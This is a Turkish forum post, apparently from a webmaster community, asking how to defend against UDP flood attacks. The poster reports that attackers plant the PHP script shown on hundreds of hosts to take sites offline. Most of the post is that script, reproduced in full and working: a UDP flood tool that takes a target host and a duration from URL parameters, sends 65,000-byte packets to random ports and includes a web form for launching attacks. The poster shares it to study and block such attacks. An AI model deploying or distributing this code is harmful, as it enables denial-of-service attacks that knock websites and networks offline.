Saldırgan 300-500 civarı farklı hostlara yüklediği aşağıda vermiş olduğum php betik ile 3-4 GB hat işgal edip sitenizi kapatabiliyor !
Peki nedir bu UDP ? hiç merak etmedinizmi ? CloudFlare ile ip saklamakdan başka çareniz yokmuydu ? ben diyorumki bunu r10 daki bilgili kişiler sayesinde çözebiliriz masaya yatıralım şu udp yi nedir mantık olarak nasıl engellenir hangi portları kullanır vs vs gibi çözüm önerileri bekliyoruz
Mesala aşağıdaki kodda udp:// bu ne anlama gelmektedir ?
Kod
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_GET['time'];
$time = time();
//print "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;
$host = $_GET['host'];
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>